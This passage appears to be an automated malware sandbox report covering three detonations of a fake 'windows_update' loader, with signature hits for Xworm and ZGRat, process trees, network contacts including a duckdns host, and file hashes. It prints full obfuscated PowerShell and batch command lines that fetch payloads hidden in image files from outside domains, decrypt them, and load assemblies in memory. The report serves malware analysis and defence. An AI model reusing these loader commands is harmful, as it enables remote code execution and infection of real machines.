memory/4904-34-0x00007FFB56ED0000-0x00007FFB570C5000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20240319-en
Max time kernel
117s
Max time network
129s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2200 wrote to memory of 2668 | N/A | C:\Windows\System32\WScript.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 2668 wrote to memory of 2460 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\windows_update\file.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$codigo = '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';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://nanoshield.pro/new_image2.jpg?166154725', 'https://nanoshd.pro/files/new_image.jpg?14441723'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('testpowershell.Home'); $method = $type.GetMethod('la').Invoke($null, [object[]] ('txt.odencko/selif/orp.dleihsonan//:sptth', '1', 'Adobe'))}}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | nanoshd.pro | udp |
| US | 8.8.8.8:53 | nanoshield.pro | udp |
| US | 104.21.37.30:443 | nanoshield.pro | tcp |
Files
memory/2668-4-0x000000001B220000-0x000000001B502000-memory.dmp
memory/2668-5-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-7-0x0000000002820000-0x0000000002828000-memory.dmp
memory/2668-6-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-8-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-9-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-10-0x0000000002740000-0x00000000027C0000-memory.dmp
memory/2668-11-0x0000000002740000-0x00000000027C0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HY769T7AS1F5GZIR22I0.temp
| MD5 | 3f25930d6bd489dfb884d6770376f149 |
| SHA1 | 5eec9cbc758bd23d2e1501ebd5d5eccec3bc4842 |
| SHA256 | 04076109e1d8a772d3053f65967be14d1a05e8e553ac2ed36f6ed920502c4f69 |
| SHA512 | 5bd726831e16be240af9e11af24a89bdb26ac32805fbd690df4b91bf8951d4af16677913c6f867e7dfac4ecabe6d8b047a5d5245ff086bc11e5ebc8fde06512a |
memory/2460-17-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2460-18-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-19-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2460-20-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-22-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-21-0x0000000002610000-0x0000000002690000-memory.dmp
memory/2460-23-0x000000001AA90000-0x000000001AADE000-memory.dmp
memory/2460-24-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
memory/2668-25-0x000007FEF5940000-0x000007FEF62DD000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win7-20231129-en
Max time kernel
118s
Max time network
119s
Command Line
Signatures
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd"
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd
C:\Windows\system32\cmd.exe
cmd /c \"set __=^&rem\
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\windows_update\loader.cmd';$yqWK='LiJdgoadiJdg'.Replace('iJdg', ''),'ChBhSSaBhSSngBhSSeExBhSStBhSSenBhSSsBhSSioBhSSnBhSS'.Replace('BhSS', ''),'CopkoQeyTkoQeokoQe'.Replace('koQe', ''),'DerzLocrzLoomprzLoresrzLosrzLo'.Replace('rzLo', ''),'GQRxjetCQRxjurQRxjrenQRxjtPQRxjrQRxjocQRxjeQRxjssQRxj'.Replace('QRxj', ''),'FrBKzDomBBKzDaBKzDseBKzD6BKzD4SBKzDtrBKzDinBKzDgBKzD'.Replace('BKzD', ''),'SzuQcplzuQcitzuQc'.Replace('zuQc', ''),'ECcAUnCcAUtrCcAUyPCcAUoCcAUinCcAUtCcAU'.Replace('CcAU', ''),'RhWnpeahWnpdhWnpLihWnpnhWnpehWnpshWnp'.Replace('hWnp', ''),'ElTwQcemeTwQcntTwQcAtTwQc'.Replace('TwQc', ''),'CrerpgJatrpgJeDerpgJcrrpgJyrpgJptrpgJorrpgJ'.Replace('rpgJ', ''),'TraUhnCnsfUhnCoUhnCrmFUhnCinUhnCalUhnCBloUhnCckUhnC'.Replace('UhnC', ''),'MkqpgaikqpgnMkqpgokqpgdulkqpgekqpg'.Replace('kqpg', ''),'InNqdDvNqdDokeNqdD'.Replace('NqdD', '');powershell -w hidden;function iZOzL($TzqHY){$CRDEw=[System.Security.Cryptography.Aes]::Create();$CRDEw.Mode=[System.Security.Cryptography.CipherMode]::CBC;$CRDEw.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$CRDEw.Key=[System.Convert]::($yqWK[5])('Y7IdTi6kX5lJbhqYY9FqtDytubVi34n2yBW8Q4423Ak=');$CRDEw.IV=[System.Convert]::($yqWK[5])('tLQNTWTubc+g+4ALClBhsw==');$AoFaY=$CRDEw.($yqWK[10])();$bufIb=$AoFaY.($yqWK[11])($TzqHY,0,$TzqHY.Length);$AoFaY.Dispose();$CRDEw.Dispose();$bufIb;}function xWxTo($TzqHY){$cdgLK=New-Object System.IO.MemoryStream(,$TzqHY);$cQORb=New-Object System.IO.MemoryStream;$eSUCm=New-Object System.IO.Compression.GZipStream($cdgLK,[IO.Compression.CompressionMode]::($yqWK[3]));$eSUCm.($yqWK[2])($cQORb);$eSUCm.Dispose();$cdgLK.Dispose();$cQORb.Dispose();$cQORb.ToArray();}$nXsEX=[System.IO.File]::($yqWK[8])([Console]::Title);$MCbHr=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 5).Substring(2))));$nFODc=xWxTo (iZOzL ([Convert]::($yqWK[5])([System.Linq.Enumerable]::($yqWK[9])($nXsEX, 
6).Substring(2))));[System.Reflection.Assembly]::($yqWK[0])([byte[]]$nFODc).($yqWK[7]).($yqWK[13])($null,$null);[System.Reflection.Assembly]::($yqWK[0])([byte[]]$MCbHr).($yqWK[7]).($yqWK[13])($null,$null); "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Network
Files
memory/3044-2-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-3-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-4-0x00000000028A0000-0x00000000028E0000-memory.dmp
memory/3044-5-0x00000000028A0000-0x00000000028E0000-memory.dmp
memory/3044-6-0x0000000073AC0000-0x000000007406B000-memory.dmp
memory/3044-7-0x00000000028A0000-0x00000000028E0000-memory.dmp
Analysis: behavioral10
Detonation Overview
Submitted
2024-04-19 07:49
Reported
2024-04-19 07:52
Platform
win10v2004-20240412-en
Max time kernel
57s
Max time network
173s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect ZGRat V1
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 1252 created 3472 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
Xworm
ZGRat
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\notepad.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\notepad.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\windows_update\loader.ps1
C:\Windows\System32\notepad.exe
C:\Windows\System32\notepad.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\vxboda.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Wogaptd = Get-Content 'C:\Users\Admin\AppData\Local\Temp\vxboda.bat' | select-object -Last 1; $Bbvjyjl = [System.Convert]::FromBase64String($Wogaptd);$Osqqdzvqkq = New-Object System.IO.MemoryStream( , $Bbvjyjl );$Ooivncxsvx = New-Object System.IO.MemoryStream;$Ouqoommak = New-Object System.IO.Compression.GzipStream $Osqqdzvqkq, ([IO.Compression.CompressionMode]::Decompress);$Ouqoommak.CopyTo( $Ooivncxsvx );$Ouqoommak.Close();$Osqqdzvqkq.Close();[byte[]] $Bbvjyjl = $Ooivncxsvx.ToArray();[Array]::Reverse($Bbvjyjl); $Bjklpyasha = [System.Threading.Thread]::GetDomain().Load($Bbvjyjl); $Pldyxr = $Bjklpyasha.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jznltd.bat" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Flmceaelwj = Get-Content 'C:\Users\Admin\AppData\Local\Temp\jznltd.bat' | select-object -Last 1; $Qpiedhffan = [System.Convert]::FromBase64String($Flmceaelwj);$Tlfdzhtvv = New-Object System.IO.MemoryStream( , $Qpiedhffan );$Oosvmvwadrd = New-Object System.IO.MemoryStream;$Ipxfr = New-Object System.IO.Compression.GzipStream $Tlfdzhtvv, ([IO.Compression.CompressionMode]::Decompress);$Ipxfr.CopyTo( $Oosvmvwadrd );$Ipxfr.Close();$Tlfdzhtvv.Close();[byte[]] $Qpiedhffan = $Oosvmvwadrd.ToArray();[Array]::Reverse($Qpiedhffan); $Uyqgmoqrr = [System.Threading.Thread]::GetDomain().Load($Qpiedhffan); $Premz = $Uyqgmoqrr.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wwtghi.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dsumix.cmd" "
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Lqctry = Get-Content 'C:\Users\Admin\AppData\Local\Temp\dsumix.cmd' | select-object -Last 1; $Gepinqdfw = [System.Convert]::FromBase64String($Lqctry);$Smjhpgfd = New-Object System.IO.MemoryStream( , $Gepinqdfw );$Ebvvkvbqat = New-Object System.IO.MemoryStream;$Ouefwyswci = New-Object System.IO.Compression.GzipStream $Smjhpgfd, ([IO.Compression.CompressionMode]::Decompress);$Ouefwyswci.CopyTo( $Ebvvkvbqat );$Ouefwyswci.Close();$Smjhpgfd.Close();[byte[]] $Gepinqdfw = $Ebvvkvbqat.ToArray();[Array]::Reverse($Gepinqdfw); $Tyossrcg = [System.Threading.Thread]::GetDomain().Load($Gepinqdfw); $Tzmchvhv = $Tyossrcg.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -command "$Epbiwzhzg = Get-Content 'C:\Users\Admin\AppData\Local\Temp\wwtghi.bat' | select-object -Last 1; $Pidhuf = [System.Convert]::FromBase64String($Epbiwzhzg);$Kfgkov = New-Object System.IO.MemoryStream( , $Pidhuf );$Rtzup = New-Object System.IO.MemoryStream;$Hvtlgiqv = New-Object System.IO.Compression.GzipStream $Kfgkov, ([IO.Compression.CompressionMode]::Decompress);$Hvtlgiqv.CopyTo( $Rtzup );$Hvtlgiqv.Close();$Kfgkov.Close();[byte[]] $Pidhuf = $Rtzup.ToArray();[Array]::Reverse($Pidhuf); $Ujrulpn = [System.Threading.Thread]::GetDomain().Load($Pidhuf); $Gkwzgehresm = $Ujrulpn.EntryPoint.DeclaringType.GetMethods()[0].Invoke($null, $null) | Out-Null"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 21.114.53.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | jdokds.duckdns.org | udp |
| GB | 57.128.155.22:8895 | jdokds.duckdns.org | tcp |
| US | 8.8.8.8:53 | 22.155.128.57.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.197.17.2.in-addr.arpa | udp |
| US | 52.111.229.43:443 | | tcp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.65.42.20.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5np0u1fr.3cu.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1252-9-0x0000022049F00000-0x0000022049F22000-memory.dmp
memory/1252-10-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1252-11-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-12-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-13-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/1252-14-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-15-0x0000022062390000-0x00000220623A0000-memory.dmp
memory/1252-16-0x0000022049C60000-0x0000022049CB3000-memory.dmp
memory/1252-17-0x0000022064810000-0x0000022064863000-memory.dmp
memory/2060-18-0x0000015558CA0000-0x0000015558CAF000-memory.dmp
memory/2060-19-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/2060-21-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-22-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-23-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-20-0x000001555A8E0000-0x000001555A8EE000-memory.dmp
memory/1252-27-0x0000022064810000-0x0000022064863000-memory.dmp
memory/1252-26-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
memory/2060-28-0x00007FFB930A0000-0x00007FFB93B61000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\vxboda.bat
| MD5 | a27d0d05a470dc95f1c74c7861761e9f |
| SHA1 | c4533a4822975c7a6316e375e365df82676dce76 |
| SHA256 | 3efe939bbca5c286978f8695ddeda122222cac8aef1c53ab8a63007e5a3287b7 |
| SHA512 | 7b3fb05433f58375e1d127f767ccd2cbc90cdce3651127db03d87867cf840002405aeaccebf16c2d1f6242e56b9fc8932210c7f194ecb8204ff1c3616b45409f |
memory/2060-33-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/376-34-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/376-35-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/376-36-0x0000000004960000-0x0000000004996000-memory.dmp
memory/2060-37-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/2060-38-0x000001555A9C0000-0x000001555A9D0000-memory.dmp
memory/376-40-0x0000000005120000-0x0000000005748000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\jznltd.bat
| MD5 | b73dc1ad88598d67c62f694c382be267 |
| SHA1 | 7a5574b1e22e860e71c47104a588cfbcc78f9a63 |
| SHA256 | 6ee076cc6d3be85fbb81e4d42276af43fcf3be7445de87d6e0497c9993ca2687 |
| SHA512 | d3afb4291432110a063be5506c4d96a82247fa666338e9ce02f19cb3d112118d65a1c1e83947cbe914f10c484f196172cf032e015b4ab00b3a08cca0c1aab675 |
memory/376-44-0x0000000004E50000-0x0000000004E72000-memory.dmp
memory/376-45-0x0000000005750000-0x00000000057B6000-memory.dmp
memory/376-48-0x0000000005840000-0x00000000058A6000-memory.dmp
memory/376-56-0x0000000005940000-0x0000000005C94000-memory.dmp
memory/3268-57-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/3268-58-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3268-59-0x0000000004F00000-0x0000000004F10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 4267fc1e87ee23aeb8b9a7d0497091c5 |
| SHA1 | 59ddae7dc44b8317ff933ad113493eb1644c52c0 |
| SHA256 | ff7daa872dda2a5fc4ce7a687bb4193774abb607d489887ffdbbd0ef71bc0d8d |
| SHA512 | 1d1b048dc3f01680f4049c23db8e4450f2d59a1174184a340e712d6e4340b3ab6191a254986c98743c5374a693733bfa6ff255b62a7b43809bd79c0804be2beb |
memory/376-71-0x0000000005F50000-0x0000000005F6E000-memory.dmp
memory/3268-72-0x0000000006410000-0x000000000645C000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\wwtghi.bat
| MD5 | 7834dbd67492fa350447dbd5debda5fc |
| SHA1 | e008dff36158beb0425d32036d9f65d5653184bd |
| SHA256 | d96f10a2672eb846ecb66d836dfe82933aca60094a367a90eee3aac0444a5573 |
| SHA512 | 02ac02dfd61f1ce96f79899523aedd6efd26a269bfecf4507ad3008fa384f9f2d9c9fac71664f7f0b1f6bdf6a397ee6757c199c0971f0b9803409f0c48d7206a |
memory/376-76-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3268-77-0x0000000004F00000-0x0000000004F10000-memory.dmp
memory/3268-78-0x0000000007680000-0x0000000007716000-memory.dmp
memory/3268-79-0x00000000068B0000-0x00000000068CA000-memory.dmp
memory/376-80-0x00000000064B0000-0x00000000064D2000-memory.dmp
memory/376-81-0x00000000077C0000-0x0000000007D64000-memory.dmp
memory/3268-82-0x0000000008900000-0x0000000008F7A000-memory.dmp
memory/376-85-0x00000000072B0000-0x00000000074E0000-memory.dmp
memory/3268-84-0x00000000077A0000-0x0000000007A38000-memory.dmp
memory/376-88-0x0000000007560000-0x000000000777E000-memory.dmp
memory/3268-86-0x0000000008280000-0x0000000008506000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\dsumix.cmd
| MD5 | f95dfe17a283dbb9301936821032b9a4 |
| SHA1 | 357edc773d07784e7fd295c2b273305994789fc4 |
| SHA256 | 22d6876c6b04fb74787a5e0803e62ed9c30cd05340ac0eb18ca358c916c3165c |
| SHA512 | 2a423ab3c92945600ef1ecc73e0e5ae46c69971b812985b46706b2447b7da1a259a3411e98ffea034aa6cc0880c154bd804785484bf9355357815d1c066d8de8 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
| MD5 | d4d8cef58818612769a698c291ca3b37 |
| SHA1 | 54e0a6e0c08723157829cea009ec4fe30bea5c50 |
| SHA256 | 98fd693b92a71e24110ce7d018a117757ffdfe0e551a33c5fa5d8888a2d74fb0 |
| SHA512 | f165b1dde8f251e95d137a466d9bb77240396e289d1b2f8f1e9a28a6470545df07d00da6449250a1a0d73364c9cb6c00fd6229a385585a734da1ac65ac7e57f6 |
memory/376-94-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-95-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-96-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/2600-97-0x0000000004E10000-0x0000000004E20000-memory.dmp
memory/376-108-0x0000000004AE0000-0x0000000004AF0000-memory.dmp
memory/3564-109-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/3564-110-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3564-111-0x00000000046B0000-0x00000000046C0000-memory.dmp
memory/3268-121-0x0000000075300000-0x0000000075AB0000-memory.dmp
memory/2600-122-0x0000000007460000-0x00000000076C2000-memory.dmp
memory/2600-123-0x0000000007D30000-0x0000000007F8C000-memory.dmp
memory/2600-124-0x0000000008030000-0x00000000080C2000-memory.dmp
memory/2600-125-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-126-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-128-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-130-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-132-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-134-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-136-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-138-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-140-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-142-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-144-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-146-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-148-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-150-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-152-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-154-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-156-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-158-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-160-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-162-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-164-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-166-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-168-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-170-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-172-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-174-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-176-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-178-0x0000000007D30000-0x0000000007F87000-memory.dmp
memory/2600-180-0x0000000007D30000-0x0000000007F87000-memory.dmp
